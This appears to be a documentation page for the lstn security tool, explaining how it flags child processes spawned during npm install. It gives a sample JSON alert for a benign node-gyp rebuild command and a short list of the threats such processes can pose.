Analysis Engine
Threat Coverage
Spawning Child Processes

Spawning child processes

Lstn detects child processes by monitoring process activity on the system where it's installed and running. When a new process is created and spawned by a parent process, lstn collects information about both the parent process and the newly spawned process. This information includes the command line used to start the process and the name of the parent process. The collected information is then used to generate a message indicating that a new process has been spawned by the parent process, in this case "npm install spawned a process".

For example: 

{
  "message": "npm install spawned a process",
  "priority": "medium",
  "package_metadata": {
    "npm_package_name": "contextify",
    "npm_package_version": "0.1.15"
  },
  "process_metadata": {
    "commandline": "sh -c node-gyp rebuild",
    "parent_name": "node"
  }
}

During npm install, malicious child processes can be spawned to carry out activities such as:

  • crypto mining
  • reconnoissance
  • sensitive data exfiltration
  • insertion of malicious payloads
Network ConnectionsWorkload Coverage